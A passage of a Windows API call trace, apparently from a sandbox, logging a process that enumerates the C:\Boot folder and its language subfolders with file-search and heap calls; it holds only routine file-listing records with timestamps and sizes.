	[0032.878] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1
	[0032.878] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.878] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.879] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.879] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.879] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.880] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.880] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1
	[0032.880] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.880] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.880] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.880] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.880] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.880] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.880] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1
	[0032.881] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.881] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.882] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.882] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1
	[0032.882] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.882] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.882] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fr-FR", cAlternateFileName="")) returned 1
	[0032.882] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.882] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.883] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.883] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.883] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.883] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.883] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1
	[0032.884] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.884] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5ff98
	[0032.884] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.884] FindNextFileW (in: hFindFile=0x7e5ff98, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.884] FindClose (in: hFindFile=0x7e5ff98 | out: hFindFile=0x7e5ff98) returned 1
	[0032.884] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.884] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1
	[0032.884] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.884] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7e5dad0
	[0032.885] FindNextFileW (in: hFindFile=0x7e5dad0, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.885] FindNextFileW (in: hFindFile=0x7e5dad0, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.886] FindClose (in: hFindFile=0x7e5dad0 | out: hFindFile=0x7e5dad0) returned 1
	[0032.886] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.886] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1
	[0032.886] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.886] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.886] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.886] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.886] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.887] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.887] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1
	[0032.887] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.887] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.888] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.888] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8510830, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12650, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.888] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.888] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.888] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1
	[0032.888] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.888] FindFirstFileW (in: lpFileName="C:\\Boot\\nb-NO\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.889] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.889] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea212efb, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15850, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.889] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.889] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.889] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1
	[0032.889] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
	[0032.889] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb430088
	[0032.890] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0032.890] FindNextFileW (in: hFindFile=0xb430088, lpFindFileData=0xaa5f808 | out: lpFindFileData=0xaa5f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0032.890] FindClose (in: hFindFile=0xb430088 | out: hFindFile=0xb430088) returned 1
	[0032.890] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb420068 | out: hHeap=0x7d60000) returned 1
	[0032.890] FindNextFileW (in: hFindFile=0x7e5ef50, lpFindFileData=0xaa5fa84 | out: lpFindFileData=0xaa5fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1
	[0032.890] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0xfffe) returned 0xb420068
